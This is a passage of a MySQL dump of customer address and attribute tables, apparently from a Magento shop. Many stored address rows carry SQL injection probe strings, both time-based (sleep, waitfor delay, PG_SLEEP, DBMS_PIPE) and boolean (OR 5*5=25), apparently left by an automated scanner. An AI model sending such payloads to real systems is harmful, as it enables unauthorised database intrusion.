(218, NULL, 116, '2026-01-02 07:14:26', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(219, NULL, 116, '2026-01-02 07:14:30', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(220, NULL, 116, '2026-01-02 07:14:35', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(221, NULL, 116, '2026-01-02 07:14:39', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY-1 waitfor delay \'0:0:15\' -- ', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(222, NULL, 116, '2026-01-02 07:14:44', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY8GtPwl1J\'; waitfor delay \'0:0:15\' -- ', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(223, NULL, 116, '2026-01-02 07:14:49', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NYnycm5Mde\' OR 147=(SELECT 147 FROM PG_SLEEP(15))--', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(224, NULL, 116, '2026-01-02 07:14:53', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NYZ0ZNVPXY\') OR 306=(SELECT 306 FROM PG_SLEEP(15))--', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(225, NULL, 116, '2026-01-02 07:14:59', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NYBwuKsKMh\')) OR 935=(SELECT 935 FROM PG_SLEEP(15))--', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(226, NULL, 116, '2026-01-02 07:15:04', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(227, NULL, 116, '2026-01-02 07:15:08', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(228, NULL, 116, '2026-01-02 07:15:08', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(229, NULL, 116, '2026-01-02 07:15:09', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY\'\"', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(230, NULL, 116, '2026-01-02 07:15:10', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '@@bNoxR', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(231, NULL, 116, '2026-01-02 07:15:11', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '(select 198766*667891)', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(232, NULL, 116, '2026-01-02 07:15:12', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', '(select 198766*667891 from DUAL)', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(233, NULL, 116, '2026-01-02 07:15:17', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(234, NULL, 116, '2026-01-02 07:15:21', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(235, NULL, 116, '2026-01-02 07:16:46', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(236, NULL, 116, '2026-01-02 07:16:53', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(237, NULL, 116, '2026-01-02 07:16:58', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(238, NULL, 116, '2026-01-02 07:16:59', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(239, NULL, 116, '2026-01-02 07:17:00', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(240, NULL, 116, '2026-01-02 07:17:00', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(241, NULL, 116, '2026-01-02 07:17:01', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(242, NULL, 116, '2026-01-02 07:17:02', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(243, NULL, 116, '2026-01-02 07:17:03', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(244, NULL, 116, '2026-01-02 07:17:04', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(245, NULL, 116, '2026-01-02 07:17:04', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(246, NULL, 116, '2026-01-02 07:17:05', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(247, NULL, 116, '2026-01-02 07:17:06', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(248, NULL, 116, '2026-01-02 07:17:07', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(249, NULL, 116, '2026-01-02 07:17:07', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(250, NULL, 116, '2026-01-02 07:17:12', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(251, NULL, 116, '2026-01-02 07:17:17', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(252, NULL, 116, '2026-01-02 07:17:22', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(253, NULL, 116, '2026-01-02 07:17:28', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(254, NULL, 116, '2026-01-02 07:17:33', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(255, NULL, 116, '2026-01-02 07:17:38', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(256, NULL, 116, '2026-01-02 07:17:43', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(257, NULL, 116, '2026-01-02 07:17:48', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(258, NULL, 116, '2026-01-02 07:17:53', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(259, NULL, 116, '2026-01-02 07:17:58', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(260, NULL, 116, '2026-01-02 07:18:02', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(261, NULL, 116, '2026-01-02 07:18:06', '2026-01-02 07:42:15', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(262, NULL, 116, '2026-01-02 07:18:11', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(263, NULL, 116, '2026-01-02 07:18:15', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(264, NULL, 116, '2026-01-02 07:18:20', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(265, NULL, 116, '2026-01-02 07:18:25', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(266, NULL, 116, '2026-01-02 07:18:30', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(267, NULL, 116, '2026-01-02 07:18:31', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(268, NULL, 116, '2026-01-02 07:18:32', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(269, NULL, 116, '2026-01-02 07:18:33', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(270, NULL, 116, '2026-01-02 07:18:34', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(271, NULL, 116, '2026-01-02 07:18:34', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(272, NULL, 116, '2026-01-02 07:18:39', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(273, NULL, 116, '2026-01-02 07:18:44', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(274, NULL, 116, '2026-01-02 07:18:45', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1 OR 5*5=25 -- ', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(275, NULL, 116, '2026-01-02 07:18:46', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1 OR 5*5=26 -- ', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(276, NULL, 116, '2026-01-02 07:18:46', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1 OR 5*5=25', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(277, NULL, 116, '2026-01-02 07:18:47', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1 OR 5*5=26', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(278, NULL, 116, '2026-01-02 07:18:48', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\' OR 5*5=25 -- ', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(279, NULL, 116, '2026-01-02 07:18:49', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\' OR 5*5=26 -- ', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(280, NULL, 116, '2026-01-02 07:18:50', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\" OR 5*5=25 -- ', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(281, NULL, 116, '2026-01-02 07:18:50', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\" OR 5*5=26 -- ', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(282, NULL, 116, '2026-01-02 07:18:51', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\' OR 5*5=25 or \'KEXjjvq1\'=\'', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(283, NULL, 116, '2026-01-02 07:18:52', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\' OR 5*5=26 or \'KEXjjvq1\'=\'', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(284, NULL, 116, '2026-01-02 07:23:37', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\" OR 5*5=25 or \"KeJioNyP\"=\"', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(285, NULL, 116, '2026-01-02 07:23:37', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\" OR 5*5=25 or \"KeJioNyP\"=\"', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(286, NULL, 116, '2026-01-02 07:23:38', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\" OR 5*5=25 or \"KeJioNyP\"=\"', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(287, NULL, 116, '2026-01-02 07:23:38', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\" OR 5*5=26 or \"KeJioNyP\"=\"', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(288, NULL, 116, '2026-01-02 07:25:16', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\" OR 5*5=26 or \"KeJioNyP\"=\"', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(289, NULL, 116, '2026-01-02 07:26:55', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', '-1\" OR 5*5=26 or \"KeJioNyP\"=\"', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(290, NULL, 116, '2026-01-02 07:33:40', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'if(now()=sysdate(),sleep(15),0)', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(291, NULL, 116, '2026-01-02 07:40:24', '2026-01-02 07:42:16', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'if(now()=sysdate(),sleep(15),0)', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `customer_address_entity_datetime`
--

CREATE TABLE `customer_address_entity_datetime` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` datetime DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Address Entity Datetime';

-- --------------------------------------------------------

--
-- Table structure for table `customer_address_entity_decimal`
--

CREATE TABLE `customer_address_entity_decimal` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Address Entity Decimal';

-- --------------------------------------------------------

--
-- Table structure for table `customer_address_entity_int`
--

CREATE TABLE `customer_address_entity_int` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` int(11) NOT NULL DEFAULT 0 COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Address Entity Int';

-- --------------------------------------------------------

--
-- Table structure for table `customer_address_entity_text`
--

CREATE TABLE `customer_address_entity_text` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` text NOT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Address Entity Text';

-- --------------------------------------------------------

--
-- Table structure for table `customer_address_entity_varchar`
--

CREATE TABLE `customer_address_entity_varchar` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Address Entity Varchar';

-- --------------------------------------------------------

--
-- Table structure for table `customer_eav_attribute`
--

CREATE TABLE `customer_eav_attribute` (
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `is_visible` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Is Visible',
  `input_filter` varchar(255) DEFAULT NULL COMMENT 'Input Filter',
  `multiline_count` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Multiline Count',
  `validate_rules` text DEFAULT NULL COMMENT 'Validate Rules',
  `is_system` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is System',
  `sort_order` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort Order',
  `data_model` varchar(255) DEFAULT NULL COMMENT 'Data Model',
  `is_used_in_grid` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Used in Grid',
  `is_visible_in_grid` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Visible in Grid',
  `is_filterable_in_grid` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Filterable in Grid',
  `is_searchable_in_grid` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Searchable in Grid'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Eav Attribute';

--
-- Dumping data for table `customer_eav_attribute`
--

INSERT INTO `customer_eav_attribute` (`attribute_id`, `is_visible`, `input_filter`, `multiline_count`, `validate_rules`, `is_system`, `sort_order`, `data_model`, `is_used_in_grid`, `is_visible_in_grid`, `is_filterable_in_grid`, `is_searchable_in_grid`) VALUES
(1, 1, NULL, 0, NULL, 1, 10, NULL, 1, 1, 1, 0),
(2, 0, NULL, 0, NULL, 1, 0, NULL, 0, 0, 0, 0),
(3, 1, NULL, 0, NULL, 1, 20, NULL, 1, 1, 0, 1),
(4, 0, NULL, 0, NULL, 0, 30, NULL, 0, 0, 0, 0),
(5, 1, 'trim', 0, '{\"max_text_length\":255,\"min_text_length\":1}', 1, 40, NULL, 0, 0, 0, 0),
(6, 0, 'trim', 0, NULL, 0, 50, NULL, 0, 0, 0, 0),
(7, 1, 'trim', 0, '{\"max_text_length\":255,\"min_text_length\":1}', 1, 60, NULL, 0, 0, 0, 0),
(8, 0, NULL, 0, NULL, 0, 70, NULL, 0, 0, 0, 0),
(9, 1, NULL, 0, '{\"input_validation\":\"email\"}', 1, 80, NULL, 1, 1, 1, 1),
(10, 1, NULL, 0, NULL, 1, 25, NULL, 1, 1, 1, 0),
(11, 0, 'date', 0, '{\"input_validation\":\"date\"}', 0, 90, NULL, 1, 1, 1, 0),
(12, 0, NULL, 0, NULL, 1, 0, NULL, 0, 0, 0, 0),
(13, 0, NULL, 0, NULL, 1, 0, NULL, 0, 0, 0, 0),
(14, 0, NULL, 0, '{\"input_validation\":\"date\"}', 1, 0, NULL, 0, 0, 0, 0),
(15, 0, NULL, 0, NULL, 1, 0, NULL, 0, 0, 0, 0),
(16, 0, NULL, 0, NULL, 1, 0, NULL, 0, 0, 0, 0),
(17, 0, NULL, 0, '{\"max_text_length\":255}', 0, 100, NULL, 1, 1, 0, 1),
(18, 0, NULL, 0, NULL, 1, 0, NULL, 1, 1, 1, 0),
(19, 0, NULL, 0, NULL, 0, 0, NULL, 1, 1, 1, 0),
(20, 0, NULL, 0, '[]', 0, 110, NULL, 1, 1, 1, 0),
(21, 1, NULL, 0, NULL, 1, 28, NULL, 0, 0, 0, 0),
(22, 0, NULL, 0, NULL, 0, 10, NULL, 0, 0, 0, 0),
(23, 1, 'trim', 0, '{\"max_text_length\":255,\"min_text_length\":1}', 1, 20, NULL, 1, 0, 0, 1),
(24, 0, 'trim', 0, NULL, 0, 30, NULL, 0, 0, 0, 0),
